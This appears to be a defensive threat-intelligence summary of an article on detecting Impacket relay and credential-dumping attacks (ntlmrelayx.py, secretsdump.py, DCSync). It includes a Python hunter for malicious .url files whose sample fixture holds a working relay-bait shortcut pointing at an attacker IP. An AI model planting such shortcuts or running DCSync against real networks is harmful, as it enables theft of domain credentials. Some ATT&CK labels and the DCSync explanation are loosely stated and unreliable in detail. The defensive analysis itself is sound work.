Full Report
Jordan Drysdale // Overview The following description of some of Impacket’s tools and techniques is a tribute to the authors, SecureAuthCorp, and the open-source effort to maintain and extend the code. […] The post Impacket Defense Basics With an Azure Lab appeared first on Black Hills Information Security, Inc.
Analysis Summary
# Tool/Technique: Impacket Toolkit (Focusing on ntlmrelayx.py and secretsdump.py)
## Overview
Impacket is a collection of Python classes that implements network protocols commonly used in Windows environments (like SMB, Kerberos, MSSQL, LDAP, NTLM). The article specifically discusses its offensive capabilities, focusing on detection and defense against tools like `ntlmrelayx.py` for relay attacks and `secretsdump.py` for credential dumping, particularly targeting Active Directory environments.
## Technical Details
- Type: Tool/Framework (Library of tools)
- Platform: Windows (Targeted environments, typically Active Directory infrastructure)
- Capabilities: Network protocol interaction, relay attacks (NTLM), credential dumping (LSASS, NTDS.dit).
- First Seen: Not specified in the context (Impacket has been around for a long time).
## MITRE ATT&CK Mapping
- **T1105 - Ingress Tool Transfer** (Implied, as offensive tools are often used post-initial compromise)
- **T1557 - Man-in-the-Middle** (As demonstrated by `ntlmrelayx.py`)
- **T1557.001 - Network Relay** (Specifically related to `ntlmrelayx.py` relaying NTLM hash submissions)
- **T1003 - OS Credential Dumping** (Related to `secretsdump.py` usage)
- **T1003.001 - LSASS Memory** (Implied usage for dumping credentials from memory)
- **T1003.006 - DCSync** (Specific sub-technique mentioned for NTDS.dit capture via `secretsdump.py`)
## Functionality
### Core Capabilities
**Impacket (General):** Provides Python libraries to implement various Windows networking protocols for testing and security auditing.
**ntlmrelayx.py:** Used to capture and relay NTLM authentication hashes. The article highlights its use together with planted LNK or URL file artifacts that cause victim hosts to silently authenticate to the attacker's listening relay, aiming for privilege escalation by capturing Domain Administrator credentials.
**secretsdump.py:** Used for retrieving sensitive credential data. Specific mention is made of its use to target the **NTDS.dit** file via **DCSync** to acquire offline domain hashes.
### Advanced Features
**NTLM Relay:** Silently submitting captured authentication hashes to target services (like Domain Controllers) to authenticate as the compromised user without knowing the plaintext password.
**DCSync Synchronization:** Utilizing the Directory Replication Service Remote Protocol (MS-DRSR via SMB/RPC) to request replication data from the DC Backup Operator/Replicator role, allowing the extraction of the entire AD database (NTDS.dit).
## Indicators of Compromise
- File Hashes: N/A (Tool execution, not a specific malware file hash provided)
- File Names: `ntlmrelayx.py`, `secretsdump.py` (When executed)
- Registry Keys: N/A
- Network Indicators: (Focus is on the *method* of attack, not static C2)
  - Relaying authentication attempts to an adversary-controlled IP address (e.g., `\\10.0.0.8\@threat.png`).
  - SMB/RPC traffic associated with DCSync access (usually inbound to the DC on port 445).
- Behavioral Indicators:
  - **LNK/URL Files:** Creation or access of shortcuts/web links pointing to network paths containing an `@` symbol followed by an attacker-controlled IP/hostname (e.g., targeting `\\IP_ADDRESS@filename`).
  - **Process Execution:** Invocations of `secretsdump.py` or command patterns suggesting LSASS access (e.g., Windows event ID 4688 on processes using tools to interact with `\\.\pipe\lsass` or starting the `RemoteRegistry` service).
  - **DCSync Activity:** Any non-DC account attempting Directory Replication Service Remote Protocol requests (DCSync) against the Domain Controller.
## Associated Threat Actors
The article focuses on the tool's use by penetration testers/adversaries in general, not specific named threat groups. Impacket is a commonly used tool across the cybersecurity landscape by both red teams and malicious actors.
## Detection Methods
- Signature-based detection: Detecting known paths or command-line arguments associated with executing the Python scripts (`Impacket`).
- Behavioral detection:
  - **Sysmon:** Creating matches against `.URL` and `.LNK` file creations for detection of the relay trigger vector.
  - **Security Event Logging:** Scrutinizing **Windows Event ID 4688** (Process Creation) for invocations associated with credential dumping (e.g., starting the `RemoteRegistry` service).
  - **Network Monitoring:** Detecting abnormal SMB/RPC traffic targeting DCs from non-standard sources that resembles DCSync initiation.
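As an added example for the Sysmon/behavioral detections above (not code from the article or from Black Hills), a small Python hunter for the `.URL` relay trigger: it parses the InternetShortcut format and flags `IconFile` or `URL` values that point at a UNC path containing an `@` sign, a literal-IP host, or a host outside an allowlist. The sample file contents and the `TRUSTED_HOSTS` allowlist are constructed assumptions; binary `.LNK` files are out of scope here.

```python
import re
from ipaddress import ip_address

# Constructed sample .url files (INI-style "InternetShortcut" format). The second one has the
# relay-trigger shape the article describes: an IconFile on an attacker IP with an "@" in the
# UNC path, which Explorer resolves (and authenticates to over SMB) as soon as the folder is listed.
SAMPLE_URL_FILES = {
    "quarterly_report.url": ("[InternetShortcut]\r\nURL=https://intranet.example.local/reports\r\n"
                             "IconFile=C:\\Windows\\System32\\shell32.dll\r\nIconIndex=13\r\n"),
    "threat.url": ("[InternetShortcut]\r\nURL=https://intranet.example.local\r\n"
                   "IconFile=\\\\10.0.0.8\\@threat.png\r\nIconIndex=1\r\n"),
}
WATCHED_KEYS = {"iconfile", "url"}  # IconFile resolves on listing, URL on click
# Assumed allowlist of file servers that legitimately host icons; adjust locally.
TRUSTED_HOSTS = {"fs01.example.local", "fs02.example.local"}
UNC_HOST = re.compile(r"^\\\\([^\\]+)")

def classify_unc(value):
    """Return why a UNC value looks like a relay trigger, or None if it does not."""
    match = UNC_HOST.match(value)
    if not match:
        return None  # not a UNC path, so nothing for SMB to authenticate to
    host = match.group(1).split("@")[0]  # also covers the \\IP@filename form
    reasons = []
    if "@" in value:
        reasons.append("at-sign in UNC path")
    try:
        ip_address(host)
        reasons.append("literal IP host")
    except ValueError:
        if host.lower() not in TRUSTED_HOSTS:
            reasons.append("untrusted host")
    return ", ".join(reasons) or None

def scan_shortcut(filename, content):
    """Parse one .url file's text and return a finding per suspicious watched key."""
    findings = []
    for line in content.splitlines():
        key, sep, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if sep and key in WATCHED_KEYS and classify_unc(value):
            findings.append({"file": filename, "key": key, "value": value,
                             "reason": classify_unc(value)})
    return findings
```

To hunt a whole share, walk it with `os.walk` and pass each `.url` file's text to `scan_shortcut`; a Sysmon FileCreate (Event ID 11) match on a new `.url` file is the natural trigger for running it.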
## Mitigation Strategies
- **For LNK/URL Relay Attacks (ntlmrelayx.py):**
  - **File Server Resource Manager (FSRM):** Configure FSRM on file shares to limit allowed file extensions, preventing the execution/triggering of harmful files.
  - **Network Segmentation:** Narrow access control to file shares where possible.
- **For Credential Dumping (secretsdump.py/DCSync):**
  - **Firewalling:** Limit SMB/RPC access (port 445) to Domain Controllers only from trusted administrative or backup infrastructure hosts.
  - **Monitoring:** Scrutinize all DCSync operations performed by non-DC entities.
  - **Principle of Least Privilege:** Ensure only authorized services/accounts (like backup systems) have the necessary permissions to perform directory replication or access LSASS memory.
## Related Tools/Techniques
- **Deploy-Deception Toolkit:** Used to create controlled objects in Active Directory specifically for detecting enumeration and Kerberoasting attempts which often precede credential dumping.
- **Olaf’s Sysmon-Modular:** Provides pre-configured Sysmon rules useful for detecting LNK/URL file proliferation.